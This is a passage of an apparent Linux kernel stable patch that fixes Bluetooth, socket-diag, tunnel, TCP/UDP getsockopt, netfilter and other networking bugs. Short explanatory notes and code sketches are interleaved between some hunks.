+ 
+ 	if (conn->conn_reason == CONN_REASON_PAIR_DEVICE)
+-		hci_cmd_sync_queue(hdev, abort_conn_sync, ERR_PTR(conn->handle),
+-				   NULL);
++		hci_abort_conn(conn, HCI_ERROR_REMOTE_USER_TERM);
+ 
+ unlock:
+ 	hci_dev_unlock(hdev);
+@@ -5381,9 +5378,9 @@ static u8 parse_adv_monitor_pattern(struct adv_monitor *m, u8 pattern_count,
+ 	for (i = 0; i < pattern_count; i++) {
+ 		offset = patterns[i].offset;
+ 		length = patterns[i].length;
+-		if (offset >= HCI_MAX_AD_LENGTH ||
+-		    length > HCI_MAX_AD_LENGTH ||
+-		    (offset + length) > HCI_MAX_AD_LENGTH)
++		if (offset >= HCI_MAX_EXT_AD_LENGTH ||
++		    length > HCI_MAX_EXT_AD_LENGTH ||
++		    (offset + length) > HCI_MAX_EXT_AD_LENGTH)
+ 			return MGMT_STATUS_INVALID_PARAMS;
+ 
+ 		p = kmalloc(sizeof(*p), GFP_KERNEL);
+@@ -8439,8 +8436,8 @@ static int read_adv_features(struct sock *sk, struct hci_dev *hdev,
+ 	supported_flags = get_supported_adv_flags(hdev);
+ 
+ 	rp->supported_flags = cpu_to_le32(supported_flags);
+-	rp->max_adv_data_len = HCI_MAX_AD_LENGTH;
+-	rp->max_scan_rsp_len = HCI_MAX_AD_LENGTH;
++	rp->max_adv_data_len = max_adv_len(hdev);
++	rp->max_scan_rsp_len = max_adv_len(hdev);
+ 	rp->max_instances = hdev->le_num_of_adv_sets;
+ 	rp->num_instances = hdev->adv_instance_cnt;
+ 
+@@ -8468,7 +8465,7 @@ static int read_adv_features(struct sock *sk, struct hci_dev *hdev,
+ 
+ static u8 calculate_name_len(struct hci_dev *hdev)
+ {
+-	u8 buf[HCI_MAX_SHORT_NAME_LENGTH + 3];
++	u8 buf[HCI_MAX_SHORT_NAME_LENGTH + 2]; /* len + type + name */
+ 
+ 	return eir_append_local_name(hdev, buf, 0);
+ }
+@@ -8476,7 +8473,7 @@ static u8 calculate_name_len(struct hci_dev *hdev)
+ static u8 tlv_data_max_len(struct hci_dev *hdev, u32 adv_flags,
+ 			   bool is_adv_data)
+ {
+-	u8 max_len = HCI_MAX_AD_LENGTH;
++	u8 max_len = max_adv_len(hdev);
+ 
+ 	if (is_adv_data) {
+ 		if (adv_flags & (MGMT_ADV_FLAG_DISCOV |
+@@ -9764,14 +9761,6 @@ void mgmt_device_disconnected(struct hci_dev *hdev, bdaddr_t *bdaddr,
+ 	struct mgmt_ev_device_disconnected ev;
+ 	struct sock *sk = NULL;
+ 
+-	/* The connection is still in hci_conn_hash so test for 1
+-	 * instead of 0 to know if this is the last one.
+-	 */
+-	if (mgmt_powering_down(hdev) && hci_conn_count(hdev) == 1) {
+-		cancel_delayed_work(&hdev->power_off);
+-		queue_work(hdev->req_workqueue, &hdev->power_off.work);
+-	}
+-
+ 	if (!mgmt_connected)
+ 		return;
+ 
+@@ -9828,14 +9817,6 @@ void mgmt_connect_failed(struct hci_dev *hdev, bdaddr_t *bdaddr, u8 link_type,
+ {
+ 	struct mgmt_ev_connect_failed ev;
+ 
+-	/* The connection is still in hci_conn_hash so test for 1
+-	 * instead of 0 to know if this is the last one.
+-	 */
+-	if (mgmt_powering_down(hdev) && hci_conn_count(hdev) == 1) {
+-		cancel_delayed_work(&hdev->power_off);
+-		queue_work(hdev->req_workqueue, &hdev->power_off.work);
+-	}
+-
+ 	bacpy(&ev.addr.bdaddr, bdaddr);
+ 	ev.addr.type = link_to_bdaddr(link_type, addr_type);
+ 	ev.status = mgmt_status(status);
+diff --git a/net/bluetooth/rfcomm/core.c b/net/bluetooth/rfcomm/core.c
+index 8d6fce9005bdd..4f54c7df3a94f 100644
+--- a/net/bluetooth/rfcomm/core.c
++++ b/net/bluetooth/rfcomm/core.c
+@@ -1937,7 +1937,7 @@ static struct rfcomm_session *rfcomm_process_rx(struct rfcomm_session *s)
+ 	/* Get data directly from socket receive queue without copying it. */
+ 	while ((skb = skb_dequeue(&sk->sk_receive_queue))) {
+ 		skb_orphan(skb);
+-		if (!skb_linearize(skb)) {
++		if (!skb_linearize(skb) && sk->sk_state != BT_CLOSED) {
+ 			s = rfcomm_recv_frame(s, skb);
+ 			if (!s)
+ 				break;
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 60619fe8af5fc..65284eeec7de5 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -2271,7 +2271,7 @@ void dev_queue_xmit_nit(struct sk_buff *skb, struct net_device *dev)
+ 	rcu_read_lock();
+ again:
+ 	list_for_each_entry_rcu(ptype, ptype_list, list) {
+-		if (ptype->ignore_outgoing)
++		if (READ_ONCE(ptype->ignore_outgoing))
+ 			continue;
+ 
+ 		/* Never send packets back to the socket
+@@ -6645,6 +6645,8 @@ static int napi_threaded_poll(void *data)
+ 	void *have;
+ 
+ 	while (!napi_thread_wait(napi)) {
++		unsigned long last_qs = jiffies;
++
+ 		for (;;) {
+ 			bool repoll = false;
+ 
+@@ -6659,6 +6661,7 @@ static int napi_threaded_poll(void *data)
+ 			if (!repoll)
+ 				break;
+ 
++			rcu_softirq_qs_periodic(last_qs);
+ 			cond_resched();
+ 		}
+ 	}
+diff --git a/net/core/scm.c b/net/core/scm.c
+index e762a4b8a1d22..a877c4ef4c256 100644
+--- a/net/core/scm.c
++++ b/net/core/scm.c
+@@ -105,7 +105,7 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
+ 		if (fd < 0 || !(file = fget_raw(fd)))
+ 			return -EBADF;
+ 		/* don't allow io_uring files */
+-		if (io_uring_get_socket(file)) {
++		if (io_is_uring_fops(file)) {
+ 			fput(file);
+ 			return -EINVAL;
+ 		}
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index d4bd10f8723df..e38a4c7449f62 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -6500,6 +6500,14 @@ static struct skb_ext *skb_ext_maybe_cow(struct skb_ext *old,
+ 		for (i = 0; i < sp->len; i++)
+ 			xfrm_state_hold(sp->xvec[i]);
+ 	}
++#endif
++#ifdef CONFIG_MCTP_FLOWS
++	if (old_active & (1 << SKB_EXT_MCTP)) {
++		struct mctp_flow *flow = skb_ext_get_ptr(old, SKB_EXT_MCTP);
++
++		if (flow->key)
++			refcount_inc(&flow->key->refs);
++	}
+ #endif
+ 	__skb_ext_put(old);
+ 	return new;
+diff --git a/net/core/sock_diag.c b/net/core/sock_diag.c
+index f7cf74cdd3db1..e6ea6764d10ab 100644
+--- a/net/core/sock_diag.c
++++ b/net/core/sock_diag.c
+@@ -190,7 +190,7 @@ int sock_diag_register(const struct sock_diag_handler *hndl)
+ 	if (sock_diag_handlers[hndl->family])
+ 		err = -EBUSY;
+ 	else
+-		sock_diag_handlers[hndl->family] = hndl;
++		WRITE_ONCE(sock_diag_handlers[hndl->family], hndl);
+ 	mutex_unlock(&sock_diag_table_mutex);
+ 
+ 	return err;
+@@ -206,7 +206,7 @@ void sock_diag_unregister(const struct sock_diag_handler *hnld)
+ 
+ 	mutex_lock(&sock_diag_table_mutex);
+ 	BUG_ON(sock_diag_handlers[family] != hnld);
+-	sock_diag_handlers[family] = NULL;
++	WRITE_ONCE(sock_diag_handlers[family], NULL);
+ 	mutex_unlock(&sock_diag_table_mutex);
+ }
+ EXPORT_SYMBOL_GPL(sock_diag_unregister);
+@@ -224,7 +224,7 @@ static int __sock_diag_cmd(struct sk_buff *skb, struct nlmsghdr *nlh)
+ 		return -EINVAL;
+ 	req->sdiag_family = array_index_nospec(req->sdiag_family, AF_MAX);
+ 
+-	if (sock_diag_handlers[req->sdiag_family] == NULL)
++	if (READ_ONCE(sock_diag_handlers[req->sdiag_family]) == NULL)
+ 		sock_load_diag_module(req->sdiag_family, 0);
+ 
+ 	mutex_lock(&sock_diag_table_mutex);
+@@ -283,12 +283,12 @@ static int sock_diag_bind(struct net *net, int group)
+ 	switch (group) {
+ 	case SKNLGRP_INET_TCP_DESTROY:
+ 	case SKNLGRP_INET_UDP_DESTROY:
+-		if (!sock_diag_handlers[AF_INET])
++		if (!READ_ONCE(sock_diag_handlers[AF_INET]))
+ 			sock_load_diag_module(AF_INET, 0);
+ 		break;
+ 	case SKNLGRP_INET6_TCP_DESTROY:
+ 	case SKNLGRP_INET6_UDP_DESTROY:
+-		if (!sock_diag_handlers[AF_INET6])
++		if (!READ_ONCE(sock_diag_handlers[AF_INET6]))
+ 			sock_load_diag_module(AF_INET6, 0);
+ 		break;
+ 	}
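
sock_diag keeps writers under sock_diag_table_mutex but lets __sock_diag_cmd() and sock_diag_bind() peek at the handler table locklessly; the READ_ONCE()/WRITE_ONCE() pairs above mark that intentional data race for KCSAN and stop the compiler from tearing or re-reading the pointer. The general pattern, as a sketch with stand-in types (not the sock_diag code itself):

struct handler { int family; };		/* stand-in payload */
#define MAX_FAMILY 46			/* stand-in for AF_MAX */

static const struct handler *handlers[MAX_FAMILY];
static DEFINE_MUTEX(table_mutex);

static void register_handler(int family, const struct handler *h)
{
	mutex_lock(&table_mutex);
	WRITE_ONCE(handlers[family], h);	/* pairs with READ_ONCE() */
	mutex_unlock(&table_mutex);
}

static bool handler_present(int family)
{
	/* Lockless peek used only as a hint (e.g. to trigger a module
	 * load); the authoritative lookup still runs under the mutex.
	 */
	return READ_ONCE(handlers[family]) != NULL;
}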
+diff --git a/net/hsr/hsr_framereg.c b/net/hsr/hsr_framereg.c
+index 0b01998780952..e44a039e36afe 100644
+--- a/net/hsr/hsr_framereg.c
++++ b/net/hsr/hsr_framereg.c
+@@ -235,6 +235,10 @@ struct hsr_node *hsr_get_node(struct hsr_port *port, struct list_head *node_db,
+ 	 */
+ 	if (ethhdr->h_proto == htons(ETH_P_PRP) ||
+ 	    ethhdr->h_proto == htons(ETH_P_HSR)) {
++		/* Check if skb contains hsr_ethhdr */
++		if (skb->mac_len < sizeof(struct hsr_ethhdr))
++			return NULL;
++
+ 		/* Use the existing sequence_nr from the tag as starting point
+ 		 * for filtering duplicate frames.
+ 		 */
+diff --git a/net/hsr/hsr_main.c b/net/hsr/hsr_main.c
+index b099c31501509..257b50124cee5 100644
+--- a/net/hsr/hsr_main.c
++++ b/net/hsr/hsr_main.c
+@@ -148,14 +148,21 @@ static struct notifier_block hsr_nb = {
+ 
+ static int __init hsr_init(void)
+ {
+-	int res;
++	int err;
+ 
+ 	BUILD_BUG_ON(sizeof(struct hsr_tag) != HSR_HLEN);
+ 
+-	register_netdevice_notifier(&hsr_nb);
+-	res = hsr_netlink_init();
++	err = register_netdevice_notifier(&hsr_nb);
++	if (err)
++		return err;
++
++	err = hsr_netlink_init();
++	if (err) {
++		unregister_netdevice_notifier(&hsr_nb);
++		return err;
++	}
+ 
+-	return res;
++	return 0;
+ }
+ 
+ static void __exit hsr_exit(void)
+diff --git a/net/ipv4/inet_diag.c b/net/ipv4/inet_diag.c
+index f7426926a1041..8f690a6e61baa 100644
+--- a/net/ipv4/inet_diag.c
++++ b/net/ipv4/inet_diag.c
+@@ -57,7 +57,7 @@ static const struct inet_diag_handler *inet_diag_lock_handler(int proto)
+ 		return ERR_PTR(-ENOENT);
+ 	}
+ 
+-	if (!inet_diag_table[proto])
++	if (!READ_ONCE(inet_diag_table[proto]))
+ 		sock_load_diag_module(AF_INET, proto);
+ 
+ 	mutex_lock(&inet_diag_table_mutex);
+@@ -1419,7 +1419,7 @@ int inet_diag_register(const struct inet_diag_handler *h)
+ 	mutex_lock(&inet_diag_table_mutex);
+ 	err = -EEXIST;
+ 	if (!inet_diag_table[type]) {
+-		inet_diag_table[type] = h;
++		WRITE_ONCE(inet_diag_table[type], h);
+ 		err = 0;
+ 	}
+ 	mutex_unlock(&inet_diag_table_mutex);
+@@ -1436,7 +1436,7 @@ void inet_diag_unregister(const struct inet_diag_handler *h)
+ 		return;
+ 
+ 	mutex_lock(&inet_diag_table_mutex);
+-	inet_diag_table[type] = NULL;
++	WRITE_ONCE(inet_diag_table[type], NULL);
+ 	mutex_unlock(&inet_diag_table_mutex);
+ }
+ EXPORT_SYMBOL_GPL(inet_diag_unregister);
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index 56776e1b1de52..0ad25e6783ac7 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -1117,7 +1117,7 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row,
+ 		sock_prot_inuse_add(net, sk->sk_prot, -1);
+ 
+ 		spin_lock(lock);
+-		sk_nulls_del_node_init_rcu(sk);
++		__sk_nulls_del_node_init_rcu(sk);
+ 		spin_unlock(lock);
+ 
+ 		sk->sk_hash = 0;
+diff --git a/net/ipv4/inet_timewait_sock.c b/net/ipv4/inet_timewait_sock.c
+index 1d77d992e6e77..340a8f0c29800 100644
+--- a/net/ipv4/inet_timewait_sock.c
++++ b/net/ipv4/inet_timewait_sock.c
+@@ -281,12 +281,12 @@ void __inet_twsk_schedule(struct inet_timewait_sock *tw, int timeo, bool rearm)
+ }
+ EXPORT_SYMBOL_GPL(__inet_twsk_schedule);
+ 
++/* Remove all non-full sockets (TIME_WAIT and NEW_SYN_RECV) for dead netns */
+ void inet_twsk_purge(struct inet_hashinfo *hashinfo, int family)
+ {
+-	struct inet_timewait_sock *tw;
+-	struct sock *sk;
+ 	struct hlist_nulls_node *node;
+ 	unsigned int slot;
++	struct sock *sk;
+ 
+ 	for (slot = 0; slot <= hashinfo->ehash_mask; slot++) {
+ 		struct inet_ehash_bucket *head = &hashinfo->ehash[slot];
+@@ -295,38 +295,35 @@ void inet_twsk_purge(struct inet_hashinfo *hashinfo, int family)
+ 		rcu_read_lock();
+ restart:
+ 		sk_nulls_for_each_rcu(sk, node, &head->chain) {
+-			if (sk->sk_state != TCP_TIME_WAIT) {
+-				/* A kernel listener socket might not hold refcnt for net,
+-				 * so reqsk_timer_handler() could be fired after net is
+-				 * freed.  Userspace listener and reqsk never exist here.
+-				 */
+-				if (unlikely(sk->sk_state == TCP_NEW_SYN_RECV &&
+-					     hashinfo->pernet)) {
+-					struct request_sock *req = inet_reqsk(sk);
+-
+-					inet_csk_reqsk_queue_drop_and_put(req->rsk_listener, req);
+-				}
++			int state = inet_sk_state_load(sk);
+ 
++			if ((1 << state) & ~(TCPF_TIME_WAIT |
++					     TCPF_NEW_SYN_RECV))
+ 				continue;
+-			}
+ 
+-			tw = inet_twsk(sk);
+-			if ((tw->tw_family != family) ||
+-				refcount_read(&twsk_net(tw)->ns.count))
++			if (sk->sk_family != family ||
++			    refcount_read(&sock_net(sk)->ns.count))
+ 				continue;
+ 
+-			if (unlikely(!refcount_inc_not_zero(&tw->tw_refcnt)))
++			if (unlikely(!refcount_inc_not_zero(&sk->sk_refcnt)))
+ 				continue;
+ 
+-			if (unlikely((tw->tw_family != family) ||
+-				     refcount_read(&twsk_net(tw)->ns.count))) {
+-				inet_twsk_put(tw);
++			if (unlikely(sk->sk_family != family ||
++				     refcount_read(&sock_net(sk)->ns.count))) {
++				sock_gen_put(sk);
+ 				goto restart;
+ 			}
+ 
+ 			rcu_read_unlock();
+ 			local_bh_disable();
+-			inet_twsk_deschedule_put(tw);
++			if (state == TCP_TIME_WAIT) {
++				inet_twsk_deschedule_put(inet_twsk(sk));
++			} else {
++				struct request_sock *req = inet_reqsk(sk);
++
++				inet_csk_reqsk_queue_drop_and_put(req->rsk_listener,
++								  req);
++			}
+ 			local_bh_enable();
+ 			goto restart_rcu;
+ 		}
+diff --git a/net/ipv4/ip_tunnel.c b/net/ipv4/ip_tunnel.c
+index 328f9068c6a43..3445e576b05bc 100644
+--- a/net/ipv4/ip_tunnel.c
++++ b/net/ipv4/ip_tunnel.c
+@@ -364,7 +364,7 @@ int ip_tunnel_rcv(struct ip_tunnel *tunnel, struct sk_buff *skb,
+ 		  bool log_ecn_error)
+ {
+ 	const struct iphdr *iph = ip_hdr(skb);
+-	int err;
++	int nh, err;
+ 
+ #ifdef CONFIG_NET_IPGRE_BROADCAST
+ 	if (ipv4_is_multicast(iph->daddr)) {
+@@ -390,8 +390,21 @@ int ip_tunnel_rcv(struct ip_tunnel *tunnel, struct sk_buff *skb,
+ 		tunnel->i_seqno = ntohl(tpi->seq) + 1;
+ 	}
+ 
++	/* Save offset of outer header relative to skb->head,
++	 * because we are going to reset the network header to the inner header
++	 * and might change skb->head.
++	 */
++	nh = skb_network_header(skb) - skb->head;
++
+ 	skb_set_network_header(skb, (tunnel->dev->type == ARPHRD_ETHER) ? ETH_HLEN : 0);
+ 
++	if (!pskb_inet_may_pull(skb)) {
++		DEV_STATS_INC(tunnel->dev, rx_length_errors);
++		DEV_STATS_INC(tunnel->dev, rx_errors);
++		goto drop;
++	}
++	iph = (struct iphdr *)(skb->head + nh);
++
+ 	err = IP_ECN_decapsulate(iph, skb);
+ 	if (unlikely(err)) {
+ 		if (log_ecn_error)
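
The ip_tunnel_rcv() fix works around a classic skb pitfall: pskb_inet_may_pull() may end up in pskb_may_pull(), which can reallocate skb->head, so any cached header pointer (here iph) is stale afterwards. Saving the header as an offset and recomputing the pointer is the standard remedy; a condensed sketch of that pattern (not the full function):

static int decap_sketch(struct sk_buff *skb, bool ether)
{
	const struct iphdr *iph;
	int nh;

	/* Keep the outer header as an offset; pointers into skb data
	 * do not survive a reallocation of skb->head.
	 */
	nh = skb_network_header(skb) - skb->head;

	skb_set_network_header(skb, ether ? ETH_HLEN : 0);

	if (!pskb_inet_may_pull(skb))	/* may reallocate skb->head */
		return -EINVAL;

	/* Recompute against the possibly new skb->head before use. */
	iph = (const struct iphdr *)(skb->head + nh);
	return IP_ECN_decapsulate(iph, skb);
}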
+diff --git a/net/ipv4/ipmr.c b/net/ipv4/ipmr.c
+index d5421c38c2aae..3ed9ed2bffd29 100644
+--- a/net/ipv4/ipmr.c
++++ b/net/ipv4/ipmr.c
+@@ -1581,9 +1581,11 @@ int ip_mroute_getsockopt(struct sock *sk, int optname, sockptr_t optval,
+ 
+ 	if (copy_from_sockptr(&olr, optlen, sizeof(int)))
+ 		return -EFAULT;
+-	olr = min_t(unsigned int, olr, sizeof(int));
+ 	if (olr < 0)
+ 		return -EINVAL;
++
++	olr = min_t(unsigned int, olr, sizeof(int));
++
+ 	if (copy_to_sockptr(optlen, &olr, sizeof(int)))
+ 		return -EFAULT;
+ 	if (copy_to_sockptr(optval, &val, olr))
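The reordering above is not cosmetic: min_t(unsigned int, olr,
sizeof(int)) converts a negative olr to a huge unsigned value and clamps
it to sizeof(int), so a later 'olr < 0' test can never fire; the sign
check has to come before the clamp. The same reorder recurs in the
tcp.c, udp.c, kcmsock.c, l2tp_ppp.c and af_x25.c hunks below. A
standalone demonstration of the conversion (min_t expanded by hand):

#include <stdio.h>

#define min_t(type, a, b) ((type)(a) < (type)(b) ? (type)(a) : (type)(b))

int main(void)
{
	int olr = -1;

	/* Wrong order: (unsigned int)-1 == 0xffffffff clamps to 4, and
	 * the negative input is silently accepted. */
	olr = min_t(unsigned int, olr, sizeof(int));
	printf("after clamp: %d, (olr < 0) is %d\n", olr, olr < 0);

	/* Right order: reject negative lengths before clamping. */
	olr = -1;
	if (olr < 0)
		printf("check first: -EINVAL\n");
	return 0;
}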
+diff --git a/net/ipv4/raw.c b/net/ipv4/raw.c
+index 7c63b91edbf7a..ee0efd0efec40 100644
+--- a/net/ipv4/raw.c
++++ b/net/ipv4/raw.c
+@@ -348,6 +348,7 @@ static int raw_send_hdrinc(struct sock *sk, struct flowi4 *fl4,
+ 		goto error;
+ 	skb_reserve(skb, hlen);
+ 
++	skb->protocol = htons(ETH_P_IP);
+ 	skb->priority = READ_ONCE(sk->sk_priority);
+ 	skb->mark = sockc->mark;
+ 	skb->tstamp = sockc->transmit_time;
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 86e7695d91adf..5a165e29f7be4 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -4102,11 +4102,11 @@ int do_tcp_getsockopt(struct sock *sk, int level,
+ 	if (copy_from_sockptr(&len, optlen, sizeof(int)))
+ 		return -EFAULT;
+ 
+-	len = min_t(unsigned int, len, sizeof(int));
+-
+ 	if (len < 0)
+ 		return -EINVAL;
+ 
++	len = min_t(unsigned int, len, sizeof(int));
++
+ 	switch (optname) {
+ 	case TCP_MAXSEG:
+ 		val = tp->mss_cache;
+diff --git a/net/ipv4/tcp_minisocks.c b/net/ipv4/tcp_minisocks.c
+index 42844d20da020..b3bfa1a09df68 100644
+--- a/net/ipv4/tcp_minisocks.c
++++ b/net/ipv4/tcp_minisocks.c
+@@ -357,10 +357,6 @@ void tcp_twsk_purge(struct list_head *net_exit_list, int family)
+ 			/* Even if tw_refcount == 1, we must clean up kernel reqsk */
+ 			inet_twsk_purge(net->ipv4.tcp_death_row.hashinfo, family);
+ 		} else if (!purged_once) {
+-			/* The last refcount is decremented in tcp_sk_exit_batch() */
+-			if (refcount_read(&net->ipv4.tcp_death_row.tw_refcount) == 1)
+-				continue;
+-
+ 			inet_twsk_purge(&tcp_hashinfo, family);
+ 			purged_once = true;
+ 		}
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 87d759bab0012..7856b7a3e0ee9 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -2790,11 +2790,11 @@ int udp_lib_getsockopt(struct sock *sk, int level, int optname,
+ 	if (get_user(len, optlen))
+ 		return -EFAULT;
+ 
+-	len = min_t(unsigned int, len, sizeof(int));
+-
+ 	if (len < 0)
+ 		return -EINVAL;
+ 
++	len = min_t(unsigned int, len, sizeof(int));
++
+ 	switch (optname) {
+ 	case UDP_CORK:
+ 		val = udp_test_bit(CORK, sk);
+diff --git a/net/ipv6/fib6_rules.c b/net/ipv6/fib6_rules.c
+index 7c20038330104..be52b18e08a6b 100644
+--- a/net/ipv6/fib6_rules.c
++++ b/net/ipv6/fib6_rules.c
+@@ -449,6 +449,11 @@ static size_t fib6_rule_nlmsg_payload(struct fib_rule *rule)
+ 	       + nla_total_size(16); /* src */
+ }
+ 
++static void fib6_rule_flush_cache(struct fib_rules_ops *ops)
++{
++	rt_genid_bump_ipv6(ops->fro_net);
++}
++
+ static const struct fib_rules_ops __net_initconst fib6_rules_ops_template = {
+ 	.family			= AF_INET6,
+ 	.rule_size		= sizeof(struct fib6_rule),
+@@ -461,6 +466,7 @@ static const struct fib_rules_ops __net_initconst fib6_rules_ops_template = {
+ 	.compare		= fib6_rule_compare,
+ 	.fill			= fib6_rule_fill,
+ 	.nlmsg_payload		= fib6_rule_nlmsg_payload,
++	.flush_cache		= fib6_rule_flush_cache,
+ 	.nlgroup		= RTNLGRP_IPV6_RULE,
+ 	.owner			= THIS_MODULE,
+ 	.fro_net		= &init_net,
+diff --git a/net/ipv6/mcast.c b/net/ipv6/mcast.c
+index 566f3b7b957e9..a777695389403 100644
+--- a/net/ipv6/mcast.c
++++ b/net/ipv6/mcast.c
+@@ -2722,7 +2722,6 @@ void ipv6_mc_down(struct inet6_dev *idev)
+ 	/* Should stop work after group drop. or we will
+ 	 * start work again in mld_ifc_event()
+ 	 */
+-	synchronize_net();
+ 	mld_query_stop_work(idev);
+ 	mld_report_stop_work(idev);
+ 
+diff --git a/net/iucv/iucv.c b/net/iucv/iucv.c
+index fc3fddeb6f36d..f66b5f74cd83a 100644
+--- a/net/iucv/iucv.c
++++ b/net/iucv/iucv.c
+@@ -156,7 +156,7 @@ static char iucv_error_pathid[16] = "INVALID PATHID";
+ static LIST_HEAD(iucv_handler_list);
+ 
+ /*
+- * iucv_path_table: an array of iucv_path structures.
++ * iucv_path_table: array of pointers to iucv_path structures.
+  */
+ static struct iucv_path **iucv_path_table;
+ static unsigned long iucv_max_pathid;
+@@ -544,7 +544,7 @@ static int iucv_enable(void)
+ 
+ 	cpus_read_lock();
+ 	rc = -ENOMEM;
+-	alloc_size = iucv_max_pathid * sizeof(struct iucv_path);
++	alloc_size = iucv_max_pathid * sizeof(*iucv_path_table);
+ 	iucv_path_table = kzalloc(alloc_size, GFP_KERNEL);
+ 	if (!iucv_path_table)
+ 		goto out;
+diff --git a/net/kcm/kcmsock.c b/net/kcm/kcmsock.c
+index 65845c59c0655..7d37bf4334d26 100644
+--- a/net/kcm/kcmsock.c
++++ b/net/kcm/kcmsock.c
+@@ -1274,10 +1274,11 @@ static int kcm_getsockopt(struct socket *sock, int level, int optname,
+ 	if (get_user(len, optlen))
+ 		return -EFAULT;
+ 
+-	len = min_t(unsigned int, len, sizeof(int));
+ 	if (len < 0)
+ 		return -EINVAL;
+ 
++	len = min_t(unsigned int, len, sizeof(int));
++
+ 	switch (optname) {
+ 	case KCM_RECV_DISABLE:
+ 		val = kcm->rx_disabled;
+diff --git a/net/l2tp/l2tp_ppp.c b/net/l2tp/l2tp_ppp.c
+index f011af6601c9c..6146e4e67bbb5 100644
+--- a/net/l2tp/l2tp_ppp.c
++++ b/net/l2tp/l2tp_ppp.c
+@@ -1356,11 +1356,11 @@ static int pppol2tp_getsockopt(struct socket *sock, int level, int optname,
+ 	if (get_user(len, optlen))
+ 		return -EFAULT;
+ 
+-	len = min_t(unsigned int, len, sizeof(int));
+-
+ 	if (len < 0)
+ 		return -EINVAL;
+ 
++	len = min_t(unsigned int, len, sizeof(int));
++
+ 	err = -ENOTCONN;
+ 	if (!sk->sk_user_data)
+ 		goto end;
+diff --git a/net/mac80211/rate.c b/net/mac80211/rate.c
+index d5ea5f5bcf3a0..9d33fd2377c88 100644
+--- a/net/mac80211/rate.c
++++ b/net/mac80211/rate.c
+@@ -119,7 +119,8 @@ void rate_control_rate_update(struct ieee80211_local *local,
+ 		rcu_read_unlock();
+ 	}
+ 
+-	drv_sta_rc_update(local, sta->sdata, &sta->sta, changed);
++	if (sta->uploaded)
++		drv_sta_rc_update(local, sta->sdata, &sta->sta, changed);
+ }
+ 
+ int ieee80211_rate_control_register(const struct rate_control_ops *ops)
+diff --git a/net/mctp/route.c b/net/mctp/route.c
+index 0144d8ebdaefb..05ab4fddc82e9 100644
+--- a/net/mctp/route.c
++++ b/net/mctp/route.c
+@@ -843,6 +843,9 @@ static int mctp_do_fragment_route(struct mctp_route *rt, struct sk_buff *skb,
+ 		/* copy message payload */
+ 		skb_copy_bits(skb, pos, skb_transport_header(skb2), size);
+ 
++		/* we need to copy the extensions, for MCTP flow data */
++		skb_ext_copy(skb2, skb);
++
+ 		/* do route */
+ 		rc = rt->output(rt, skb2);
+ 		if (rc)
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index d3ba947f43761..0a86c019a75de 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -1205,7 +1205,7 @@ static int nf_tables_updtable(struct nft_ctx *ctx)
+ 	if (flags & ~NFT_TABLE_F_MASK)
+ 		return -EOPNOTSUPP;
+ 
+-	if (flags == ctx->table->flags)
++	if (flags == (ctx->table->flags & NFT_TABLE_F_MASK))
+ 		return 0;
+ 
+ 	if ((nft_table_has_owner(ctx->table) &&
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index e1969209b3abb..58eca26162735 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -2240,8 +2240,6 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,
+ 	if (m) {
+ 		rcu_barrier();
+ 
+-		nft_set_pipapo_match_destroy(ctx, set, m);
+-
+ 		for_each_possible_cpu(cpu)
+ 			pipapo_free_scratch(m, cpu);
+ 		free_percpu(m->scratch);
+@@ -2253,8 +2251,7 @@ static void nft_pipapo_destroy(const struct nft_ctx *ctx,
+ 	if (priv->clone) {
+ 		m = priv->clone;
+ 
+-		if (priv->dirty)
+-			nft_set_pipapo_match_destroy(ctx, set, m);
++		nft_set_pipapo_match_destroy(ctx, set, m);
+ 
+ 		for_each_possible_cpu(cpu)
+ 			pipapo_free_scratch(priv->clone, cpu);
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index c3117350f5fbb..7188ca8d84693 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -3981,7 +3981,7 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 		if (val < 0 || val > 1)
+ 			return -EINVAL;
+ 
+-		po->prot_hook.ignore_outgoing = !!val;
++		WRITE_ONCE(po->prot_hook.ignore_outgoing, !!val);
+ 		return 0;
+ 	}
+ 	case PACKET_TX_HAS_OFF:
+@@ -4110,7 +4110,7 @@ static int packet_getsockopt(struct socket *sock, int level, int optname,
+ 		       0);
+ 		break;
+ 	case PACKET_IGNORE_OUTGOING:
+-		val = po->prot_hook.ignore_outgoing;
++		val = READ_ONCE(po->prot_hook.ignore_outgoing);
+ 		break;
+ 	case PACKET_ROLLOVER_STATS:
+ 		if (!po->rollover)
+diff --git a/net/rds/send.c b/net/rds/send.c
+index a4ba45c430d81..0005fb43f2dfa 100644
+--- a/net/rds/send.c
++++ b/net/rds/send.c
+@@ -103,13 +103,12 @@ EXPORT_SYMBOL_GPL(rds_send_path_reset);
+ 
+ static int acquire_in_xmit(struct rds_conn_path *cp)
+ {
+-	return test_and_set_bit(RDS_IN_XMIT, &cp->cp_flags) == 0;
++	return test_and_set_bit_lock(RDS_IN_XMIT, &cp->cp_flags) == 0;
+ }
+ 
+ static void release_in_xmit(struct rds_conn_path *cp)
+ {
+-	clear_bit(RDS_IN_XMIT, &cp->cp_flags);
+-	smp_mb__after_atomic();
++	clear_bit_unlock(RDS_IN_XMIT, &cp->cp_flags);
+ 	/*
+ 	 * We don't use wait_on_bit()/wake_up_bit() because our waking is in a
